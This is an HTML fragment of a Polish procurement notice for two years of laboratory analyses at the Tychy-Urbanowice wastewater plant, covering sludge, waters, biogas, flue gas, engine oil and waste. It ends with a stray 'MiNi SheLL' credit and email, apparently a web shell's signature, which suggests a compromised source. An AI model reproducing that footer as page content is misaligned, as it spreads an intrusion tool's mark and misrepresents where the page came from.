<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie analiz laboratoryjnych ścieków, osadu ściekowego, wód powierzchniowych i podziemnych oraz rudy darniowej dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1A) Analiza ścieków w zakresie:
a.Azot Kjeldahla - 100 analiz
b.BZT5 - 100 analiz.

2A) Analiza ścieków w zakresie:
a.Węglowodory ropopochodne - 100 analiz
b.Chrom ogólny- 100 analiz
c.Cynk - 100 analiz 
d.Nikiel - 100 analiz
e.Ołów - 100 analiz.

3A) Analiza wód powierzchniowych w zakresie:
a.Azot Kjeldahla - 8 analiz
b.BZT5 - 8 analiz
c.Węglowodory  ropopochodne - 8 analiz 
d.Chrom ogólny - 8 analiz
e.Cynk - 8 analiz
f.Nikiel - 8 analiz
g.Ołów - 8 analiz.

4A) Analiza ścieków w zakresie:
fenole lotne, chlorki, siarczany, rtęć, kadm, cynk, miedź, nikiel, chrom, ołów, arsen, wanad, srebro, heksachlorocykloheksan (HCH), tetrachlorometan (czterochlorek węgla - CCl4), pentachlorofenol (PCP), aldryna, dieldryna, endryna, izodryna, heksachlorobenzen (HCB), heksachlorobutadien (HCBD), trichlorometan (chloroform - CHCl3), 1,2-dichloroetan (EDC), trichloroetylen (TRI), tetrachloroetylen (nadchloroetylen - PER), trichlorobenzen (TCB) - 8 analiz.
	
5A) Analiza ścieków w zakresie:
a.ChZTCr - 100 analiz
b.BZT5 - 100 analiz
c.Zawiesina ogólna- 100 analiz
d.Azot ogólny (z rozbiciem na składowe: azot amonowy, azotynowy, azotanowy, Kjeldahla) - 100 analiz
e.Fosfor ogólny - 100 analiz.

6A) Analiza osadu ściekowego w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 06 lutego 2015r.  w sprawie komunalnych osadów ściekowych wraz z wydaniem opinii - 48 analiz.

7A) Analiza odwodnionego osadu ściekowego w zakresie: Escherichia Coli - 25 analiz.

8A) Analiza osadu ściekowego w zakresie: Enterokoki - 25 analiz.

9A) Analiza wód podziemnych w zakresie: odczyn, przewodność elektryczna właściwa PEW, ołów, kadm, miedź, cynk, chrom VI, rtęć, bor, sód, magnez, glin, potas, wapń, mangan, ogólny węgiel organiczny OWO, wodorowęglany, ortofosforany, chlorki, siarczany, amoniak, azotyny, azotany, indeks fenolowy, substancje powierzchniowo czynne- anionowe - 8 analiz.

10A) Analizy rudy darniowej: oznaczenie żelaza ogólnego, żelaza Fe2+, pH wyciągu wodnego, pozostałość nierozpuszczalna w HCl, wilgotność - 7  analiz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. TERMIN PŁATNOŚCI - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie analiz laboratoryjnych biogazu i spalin (pomiar emisji zanieczyszczeń) dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1B) Analiza biogazu:
a.Przed instalacją odsiarczania H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] - 24 analizy
b.Za instalacją odsiarczania: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3] , wilgotność, wartość opałowa [MJ/Nm3] - 24 analizy
c.Za instalacją odsiarczania: badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan - 16 analiz
d.Z modelu laboratoryjnego komór fermentacyjnych w zakresie: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3] , wilgotność, wartość opałowa [MJ/Nm3], ciepło spalania [MJ/Nm3], próbki przechowywane w zbiornikach o objętości 80 dm3 - 112 analiz

2B) Analiza spalin (pomiar emisji zanieczyszczeń w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 30 października 2014r. Dz. U 2014 poz. 1542: CO, CO2, NOx, SO2, pyły - 16 analiz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. TERMIN PŁATNOŚCI - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie analiz laboratoryjnych oleju silnikowego dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1C) Badanie oleju silnikowego w zakresie: glin, miedź, chrom, żelazo, ołów, cyna, nikiel, bor, siarka, krzem, sód, potas, fosfor, molibden, magnez, wapń, cynk, lepkość 40 oC, lepkość 100 oC, liczba kwasowa, liczba zasadowa, IpH, glikol, nitracja, sulfatacja, wilgoć, oksydacja oraz wydanie opinii, czy dany olej nadaje się do dalszego stosowania w silnikach opalanych biogazem - 60 analiz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. TERMIN PŁATNOŚCI - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonywanie analiz laboratoryjnych odpadów dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1D) Badanie odpadów w zakresie: wilgotność, popiół w 550 oC, ciepło spalania stan suchy, ciepło spalania stan roboczy, wartość opałowa stan roboczy, wartość opałowa stan suchy, węgiel całkowity, wodór, azot, siarka całkowita, chlor, fluor, brom - 50 analiz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. TERMIN PŁATNOŚCI - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com